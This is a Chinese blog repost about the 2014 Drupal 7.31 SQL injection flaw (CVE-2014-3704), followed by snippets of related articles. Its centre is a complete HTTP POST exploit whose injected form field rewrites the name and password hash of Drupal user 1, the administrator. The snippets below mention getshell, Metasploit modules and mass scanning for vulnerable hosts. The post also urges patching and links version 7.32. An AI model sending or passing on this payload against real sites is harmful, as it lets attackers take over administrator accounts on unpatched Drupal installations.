Drupal 7.31版本爆严重SQL注入漏洞

最新推荐文章于 2023-10-07 15:55:27 发布
最新推荐文章于 2023-10-07 15:55:27 发布
阅读量248 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/security4399/p/4028533.html
版权

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码。

在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

测试代码:(请勿用于非法用途)

POST /drupal-7.31/?q=node&destination=node HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/drupal-7.31/ Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 231 name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

本地环境测试效果:

请相关厂商关注,并尽快修复漏洞。

新版下载:

https://www.drupal.org/drupal-7.32

转载于:https://www.cnblogs.com/security4399/p/4028533.html

weixin_30460489
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
weixin_46236101的博客
09-18 703
Drupal是一种少量大量的CMS,其7.0〜7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入,修改管理员信息,甚至执行任意代码。 进攻环境 执行如下命令启动Drupal 7.31环境: docker-compose up -d 环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用替代配置安装即可。 其中,Mysql数据库名填写drupal,数据库用户名,密码为root,地址为mysql: 安装完成后,访问首页: 进攻复现
Drupal 7.31 SQL注射分析POC
weixin_34068198的博客
09-09 76
漏洞昨日发 ,我们有时间去看看今天的代码。 于Drupal于,跑sql声明使用PDO型号,这是一般能够避免大部分的注射,由于使用占位符的sql语法语句是限制。 但是,这并不意味着绝对安全,。 在Drupal的user模块中,找到user.module: $account = db_query("SELECT * FROM {users} WHERE name = :name A...
Drupal 7.31 SQL注入漏洞
小小猪的博客
11-15 1847
Drupal 7.31 SQL注入漏洞 漏洞详解: Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以也就只是写个Exp不再深入下去。 环境搭建: drupla 下载地址 环境打包在目录下安装即可 中间遇到的问题: 解决方法:关闭extersion=php_mbstring.dll(修改前注意备份原来的) xploit:.
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
EC_Carrot的博客
05-27 399
漏洞背景 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 漏洞复现 该漏洞无需认证,发送如下数据包即可执行恶意SQL语句: POST /?q=node&destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User
drupalgeddon:针对 drupalgeddon SQL 注入漏洞的常见攻击向量和防御示例
07-08
这会注入一些 SQL 并安装 2 个后门。 deobfuscate.php :仅供参考。 在exploit.php的第60行上传的文件的反混淆版本 execute-php.php :必须与exploit.php结合使用。 一旦exploit.php 运行完毕, execute-php.php就...
Drupal User Karma模块跨站脚本和SQL注入漏洞.php
12-15
Drupal User Karma模块跨站脚本和SQL注入漏洞.php
Drupal7.X小版本升级
05-05
Drupal 7.x 小版本升级是一个常规的维护过程,旨在确保你的网站持续获得安全更新和新功能。在 Drupal 社区,小版本升级通常是指从7.0到7.1,7.1到7.2等这样的升级,不涉及重大功能变更。下面详细解释这个过程: 1. ...
dkan2:Drupal 8 版本的 DKAN
05-30
已弃用 DKAN 2.x 的代码已移至存储库。 基于开放数据门户/目录 - Release Candidate ... 用于存储 CSV 文件并使它们可通过 SQL 端点进行查询的数据存储。 执照 DKAN 和相关模块在许可下免费提供。
Drupal 7.31版本严重SQL注入漏洞 安全狗可守护
weixin_33824363的博客
10-24 193
2019独角兽企业重金招聘Python工程师标准>>> ...
drupal7源码
02-16
drupal为开发者最好的开源选择。多研究研究
[Vulnhub]Drupal7.3漏洞复现
最新发布
qq_69209270的博客
10-07 269
cve-2014-3704主要判断是否有sql漏洞,后面操作全是靠kali中工具网站要学会利用kali中的工具,kali中工具很多,尤其是searchsploit工具,大部分cms漏洞都可以在上面找到。
DC-1 登录框的sql注入
a_153161的博客
12-04 1155
DC-1登录框的报错注入
Drupal漏洞复现:CVE-2019-6341
weixin_59086772的博客
12-30 2203
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
Vulnhub[DC1]
Townmacro的博客
06-10 105
kali中使用arp-scan进行主机探活 经过筛选可以知道192.168.0.150 是DC-1的ip 可以这里开启了22、80、111端口我们先从80端口入手这里可以发现用的是DrupalCMS启动msf,搜索下Drupal可用的EXP 这里我们选用exploit/unix/webapp/drupal_drupalgeddon2因为他是最新的,而且品质为excellent 这样我们就可以成功得到一个会话。我们用会话返回一个shell查看目录,获取flag1这里也就是提示说去查看DrupalC
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704)
qq_51577576的博客
02-16 1386
[ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704) Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3266
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
weixin_33759269的博客
11-25 1069
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。   0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1...
请介绍SQL注入漏洞检测、XSS漏洞检测、端口扫描与服务发现技术、CMS技术,
05-16
1. SQL注入漏洞检测: SQL注入是一种针对Web应用程序的攻击技术,通过在Web应用程序中注入SQL命令来实现对数据库的非法访问。SQL注入漏洞检测可以通过在输入参数中注入特定的SQL语句来测试Web应用程序是否容易受到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值